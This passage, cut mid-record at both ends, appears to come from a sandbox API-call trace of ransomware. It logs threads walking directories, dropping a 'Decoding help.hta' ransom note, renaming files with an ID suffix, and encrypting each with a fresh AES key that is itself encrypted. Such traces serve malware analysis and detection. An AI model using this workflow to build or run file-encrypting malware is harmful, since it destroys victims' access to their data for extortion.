1 [0047.195] CryptDestroyKey (hKey=0x5db6b8) returned 1 [0047.195] CryptReleaseContext (hProv=0x3449f08, dwFlags=0x0) returned 1 [0047.196] SetFilePointerEx (in: hFile=0x770, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.196] WriteFile (in: hFile=0x770, lpBuffer=0x590fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x590fcf8, lpOverlapped=0x0 | out: lpBuffer=0x590fbe4*, lpNumberOfBytesWritten=0x590fcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.368] WriteFile (in: hFile=0x770, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x590fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x590fcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.368] CloseHandle (hObject=0x770) returned 1 [0051.383] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.271] FindNextFileW (in: hFindFile=0x5e3670, lpFindFileData=0x590fd30 | out: lpFindFileData=0x590fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c444100, ftCreationTime.dwHighDateTime=0x1cc114e, ftLastAccessTime.dwLowDateTime=0xa3e6ce80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x5c444100, ftLastWriteTime.dwHighDateTime=0x1cc114e, nFileSizeHigh=0x0, nFileSizeLow=0xdf600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdia80.dll", cAlternateFileName="")) returned 0 [0055.271] FindClose (in: hFindFile=0x5e3670 | out: hFindFile=0x5e3670) returned 1 Thread: id = 579 os_tid = 0xd50 [0045.649] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*", lpFindFileData=0xa9cfd30 | out: lpFindFileData=0xa9cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e36b0 [0045.649] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.649] FindNextFileW (in: hFindFile=0x5e36b0, lpFindFileData=0xa9cfd30 | out: lpFindFileData=0xa9cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.839] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.839] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.839] FindNextFileW (in: hFindFile=0x5e36b0, lpFindFileData=0xa9cfd30 | out: lpFindFileData=0xa9cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0048.839] FindClose (in: hFindFile=0x5e36b0 | out: hFindFile=0x5e36b0) returned 1 Thread: id = 580 os_tid = 0xd54 [0045.649] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*", lpFindFileData=0xb78fd30 | out: lpFindFileData=0xb78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e34b0 [0048.841] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.841] FindNextFileW (in: hFindFile=0x5e34b0, lpFindFileData=0xb78fd30 | out: lpFindFileData=0xb78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.841] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.841] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.841] FindNextFileW (in: hFindFile=0x5e34b0, lpFindFileData=0xb78fd30 | out: lpFindFileData=0xb78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0048.841] lstrcmpW (lpString1=".", lpString2="vcRuntimeMinimum_x86") returned -1 [0048.841] lstrcmpW (lpString1="..", lpString2="vcRuntimeMinimum_x86") returned -1 [0048.842] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeMinimum_x86") returned 1 [0048.842] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*" [0048.842] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*") returned 99 [0048.842] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\", lpString2="vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" [0048.842] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*" [0048.842] GlobalMemoryStatus (in: lpBuffer=0xb78fd10 | out: lpBuffer=0xb78fd10) [0048.842] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x112a4098, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a4 [0048.845] CloseHandle (hObject=0x5a4) returned 1 [0048.845] FindNextFileW (in: hFindFile=0x5e34b0, lpFindFileData=0xb78fd30 | out: lpFindFileData=0xb78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0048.845] FindClose (in: hFindFile=0x5e34b0 | out: hFindFile=0x5e34b0) returned 1 Thread: id = 581 os_tid = 0xd58 [0045.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*", lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeee1cd90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef058230, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a30 [0045.977] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.977] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeee1cd90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef058230, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.978] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.978] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.978] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc52bb100, ftCreationTime.dwHighDateTime=0x1ca6185, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xc52bb100, ftLastWriteTime.dwHighDateTime=0x1ca6185, nFileSizeHigh=0x0, nFileSizeLow=0x2cc7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MCABOUT.HTM", cAlternateFileName="")) returned 1 [0045.978] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*" [0045.978] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*") returned 69 [0045.978] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\Decoding help.hta" [0045.978] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\decoding help.hta")) returned 0xffffffff [0045.978] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0045.978] WriteFile (in: hFile=0x3c0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x334fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x334fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.979] CloseHandle (hObject=0x3c0) returned 1 [0045.979] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0045.980] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MCABOUT.HTM") returned -1 [0045.980] lstrlenW (lpString="MCABOUT.HTM") returned 11 [0045.980] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*" [0045.980] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*") returned 69 [0045.980] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\", lpString2="MCABOUT.HTM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" [0045.980] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" [0045.980] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.[ID]g9uZrLhJaygpwRm1[ID]" [0045.980] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0045.982] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0045.982] CreateFileMappingA (hFile=0x3c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c4 [0045.982] CryptAcquireContextA (in: phProv=0x334fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x334fcec*=0x3448d80) returned 1 [0045.983] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0x334fce8 | out: phKey=0x334fce8*=0x671cb0) returned 1 [0045.983] CryptExportKey (in: hKey=0x671cb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x334fbe4, pdwDataLen=0x334fce4 | out: pbData=0x334fbe4*, pdwDataLen=0x334fce4*=0x2c) returned 1 [0045.983] MapViewOfFile (hFileMappingObject=0x3c4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2cc0) returned 0x3f90000 [0046.093] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x334fbe4*, pdwDataLen=0x334fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x334fbe4*, pdwDataLen=0x334fcf8*=0x100) returned 1 [0046.093] CryptEncrypt (in: hKey=0x671cb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f90000, pdwDataLen=0x334fce4*=0x2cc0, dwBufLen=0x2cc0 | out: pbData=0x3f90000*, pdwDataLen=0x334fce4*=0x2cc0) returned 1 [0046.093] UnmapViewOfFile (lpBaseAddress=0x3f90000) returned 1 [0046.095] CloseHandle (hObject=0x3c4) returned 1 [0046.095] CryptDestroyKey (hKey=0x671cb0) returned 1 [0046.095] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0046.095] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.095] WriteFile (in: hFile=0x3c0, lpBuffer=0x334fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x334fcf8, lpOverlapped=0x0 | out: lpBuffer=0x334fbe4*, lpNumberOfBytesWritten=0x334fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.096] WriteFile (in: hFile=0x3c0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x334fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x334fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.096] CloseHandle (hObject=0x3c0) returned 1 [0046.097] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.097] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b89b100, ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7b89b100, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x4380, dwReserved0=0x0, dwReserved1=0x0, cFileName="STINTL.DLL", cAlternateFileName="")) returned 1 [0046.097] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*" [0046.097] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*") returned 69 [0046.097] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\Decoding help.hta" [0046.097] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\decoding help.hta")) returned 0x1 [0046.097] lstrcmpiW (lpString1="Decoding help.hta", lpString2="STINTL.DLL") returned -1 [0046.097] lstrlenW (lpString="STINTL.DLL") returned 10 [0046.097] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*" [0046.097] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*") returned 69 [0046.097] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\", lpString2="STINTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL" [0046.097] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL" [0046.097] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0046.097] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.098] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0046.099] CreateFileMappingA (hFile=0x3c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c4 [0046.099] CryptAcquireContextA (in: phProv=0x334fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x334fcec*=0x3448d80) returned 1 [0046.099] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0x334fce8 | out: phKey=0x334fce8*=0x671cf0) returned 1 [0046.099] CryptExportKey (in: hKey=0x671cf0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x334fbe4, pdwDataLen=0x334fce4 | out: pbData=0x334fbe4*, pdwDataLen=0x334fce4*=0x2c) returned 1 [0046.099] MapViewOfFile (hFileMappingObject=0x3c4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4380) returned 0x2fe0000 [0046.102] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x334fbe4*, pdwDataLen=0x334fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x334fbe4*, pdwDataLen=0x334fcf8*=0x100) returned 1 [0046.102] CryptEncrypt (in: hKey=0x671cf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fe0000, pdwDataLen=0x334fce4*=0x4380, dwBufLen=0x4380 | out: pbData=0x2fe0000*, pdwDataLen=0x334fce4*=0x4380) returned 1 [0046.103] UnmapViewOfFile (lpBaseAddress=0x2fe0000) returned 1 [0046.104] CloseHandle (hObject=0x3c4) returned 1 [0046.104] CryptDestroyKey (hKey=0x671cf0) returned 1 [0046.104] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0046.104] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.105] WriteFile (in: hFile=0x3c0, lpBuffer=0x334fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x334fcf8, lpOverlapped=0x0 | out: lpBuffer=0x334fbe4*, lpNumberOfBytesWritten=0x334fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.105] WriteFile (in: hFile=0x3c0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x334fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x334fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.105] CloseHandle (hObject=0x3c0) returned 1 [0046.106] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.107] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc65b900, ftCreationTime.dwHighDateTime=0x1caac22, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xdc65b900, ftLastWriteTime.dwHighDateTime=0x1caac22, nFileSizeHigh=0x0, nFileSizeLow=0x3580, dwReserved0=0x0, dwReserved1=0x0, cFileName="STINTL.DLL.IDX_DLL", cAlternateFileName="STINTL~1.IDX")) returned 1 [0046.107] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*" [0046.107] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*") returned 69 [0046.107] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\Decoding help.hta" [0046.107] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\decoding help.hta")) returned 0x1 [0046.107] 